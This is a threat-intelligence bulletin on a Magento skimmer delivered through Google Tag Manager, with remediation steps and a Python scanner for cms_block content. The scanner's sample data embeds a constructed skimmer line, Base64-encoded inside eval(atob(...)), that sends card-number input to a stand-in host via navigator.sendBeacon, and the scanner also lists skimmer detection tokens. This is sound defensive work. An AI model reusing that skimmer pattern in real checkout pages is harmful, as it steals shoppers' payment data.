Google Tag Manager Skimmer Steals Credit Card Information From Magento Sites


Executive Summary

A recent investigation by Sucuri uncovered a sophisticated credit card skimmer on a Magento-based eCommerce website, leveraging Google Tag Manager (GTM) to inject malicious JavaScript and steal payment details. The malware was hidden within the cms_block.content database table, allowing attackers to discreetly intercept checkout page transactions. Further analysis by Sucuri revealed a backdoor in the media directory, granting persistent access to attackers. The malware exfiltrated credit card data in real time, sending it to a remote server controlled by cybercriminals.

Community Impact

Retail and hospitality organizations, particularly those operating eCommerce platforms, are at high risk of similar GTM-based attacks. Attackers using stealthy, legitimate-looking scripts make it difficult for store owners to detect and respond to threats in real time. Since WordPress and Magento are popular eCommerce solutions, this attack methodology could be widely applicable across many retail and hospitality brands using these platforms. If not properly mitigated, businesses could suffer financial losses, chargebacks, and even compliance violations under PCI DSS regulations. RH-ISAC organizations should ingest the intelligence in this report, the original report linked above, and the remediation steps listed below.

Technical Analysis

The attack leveraged GTM to inject malicious JavaScript, allowing cybercriminals to steal credit card data entered during the checkout process. The malicious GTM payload included Base64-encoded and obfuscated scripts, designed to evade detection by traditional security tools. The malware targeted payment forms by either intercepting legitimate payment fields or injecting a fake form to trick users into entering their details.

The Sucuri investigation also uncovered a hidden backdoor in media/index.php, which allowed attackers to maintain persistent access and potentially reinfect the site. The backdoor operated by decoding and executing Base64-encoded payloads, effectively bypassing traditional security monitoring. Further research revealed that at least six websites were infected with the same GTM ID, indicating a broader campaign.

Attackers used dynamic script injection techniques to hide their payloads within what appeared to be a legitimate Google Analytics or GTM script. The malware used navigator.sendBeacon to exfiltrate stolen payment data to a malicious server. The campaign was linked to Magecart-style attacks, where cybercriminals inject malicious scripts into eCommerce platforms to steal credit card details.

Recommendations

Sucuri has provided the following steps to remediate GTM-based malware:

  • Remove any suspicious GTM tags. Log into GTM, identify, and delete any suspicious tags.
  • Perform a full website scan to detect any other malware or backdoors.
  • Remove any malicious scripts or backdoor files.
  • Ensure Magento and all extensions are up-to-date with security patches.
  • Regularly monitor site traffic and GTM for any unusual activity.
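As an added example (not code from Sucuri or from the Magento project), the scanner below applies the indicators described in the technical analysis to the "full website scan" step above: it reads rows shaped like Magento's cms_block table, flags GTM container IDs the store does not own, and decodes long Base64 runs to look for skimmer primitives such as navigator.sendBeacon and payment-field hooks. The sample rows, the GTM IDs, the collector hostname and the allowlist are constructed for this example.

```python
import base64
import re

# Tokens a checkout skimmer relies on: payment-field hooks plus decode/exfiltration primitives.
SUSPECT_TOKENS = ("navigator.sendBeacon", "atob(", "eval(", "cc_number", "card_number", "cc_cid")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long Base64-looking runs
GTM_ID = re.compile(r"GTM-[A-Z0-9]{5,}")             # GTM container ID as it appears in the loader snippet

def decode_blobs(content):
    """Decode every long Base64 run in `content` that yields readable text."""
    out = []
    for m in B64_RUN.finditer(content):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            out.append(text)
    return out

def scan_cms_block(block_id, content, allowed_gtm_ids):
    """Return findings for one cms_block row: unknown GTM containers and skimmer tokens."""
    findings = []
    for gtm in sorted(set(GTM_ID.findall(content))):
        if gtm not in allowed_gtm_ids:
            findings.append({"block_id": block_id, "kind": "unknown_gtm_container", "detail": gtm})
    # Check the raw content first, then each decoded Base64 blob hidden inside it.
    for label, text in [("plain", content)] + [("base64", t) for t in decode_blobs(content)]:
        hits = [tok for tok in SUSPECT_TOKENS if tok in text]
        if hits:
            findings.append({"block_id": block_id, "kind": f"skimmer_tokens_{label}", "detail": hits})
    return findings

# Constructed sample rows standing in for `SELECT block_id, content FROM cms_block`.
# The container IDs, hostname and script bodies below are invented for this example.
_SKIMMER_JS = ('document.querySelector("#cc_number").addEventListener("change",'
               'function(e){navigator.sendBeacon("https://collector.invalid/s",e.target.value)})')
SAMPLE_CMS_BLOCKS = [
    (1, "<p>Free shipping on orders over $50.</p>"),
    (2, '<script>(function(w,d,s,l,i){/* gtm loader */})(window,document,"script","dataLayer","GTM-ABCDE12");</script>'),
    (3, '<script>eval(atob("' + base64.b64encode(_SKIMMER_JS.encode()).decode() + '"))</script>'),
]
ALLOWED_GTM_IDS = {"GTM-OWNED00"}   # container IDs the store actually owns (constructed)

def scan_all(rows=SAMPLE_CMS_BLOCKS, allowed=ALLOWED_GTM_IDS):
    """Scan every row and return the combined list of findings."""
    return [f for block_id, content in rows for f in scan_cms_block(block_id, content, allowed)]

if __name__ == "__main__":
    for finding in scan_all():
        print(finding)
```

Replace the sample rows with a real query against the store's cms_block table and the allowlist with the container IDs visible in your own GTM account; any container ID the store does not recognise deserves the same scrutiny as a decoded blob.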
